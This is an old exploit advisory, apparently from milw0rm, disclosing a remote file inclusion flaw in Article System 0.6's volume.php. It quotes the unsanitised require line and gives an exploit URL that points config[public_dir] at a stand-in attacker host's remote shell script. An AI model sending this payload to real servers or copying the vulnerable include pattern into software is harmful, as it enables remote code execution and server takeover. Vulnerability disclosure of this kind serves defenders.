Article System 0.6 (volume.php) Remote File Include Vulnerability

********************************************************************************************************** Coding 4 Fun (c4f.pl) ********************************************************************************************************** * Article System 0.6 ; * Class = Remote File Inclusion ; * Download = http://sourceforge.net/project/showfiles.php?group_id=49971&package_id=43403&release_id=325871 ; * Found by = GregStar (gregstar[at]c4f[dot]pl) ; ------------------------------------------------------------------------------------------------------------------- - Vulnerable Code in volume.php: require "{$config['public_dir']}/templates/html/volume.php" ; - Exploit: http://[target]/[path]/volume.php?config[public_dir]=http://evilsite.com/shell? ------------------------------------------------------------------------------------------------------------------ Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,kw@ch and for all friends. ************************************************************************************************************** # milw0rm.com [2006-11-02]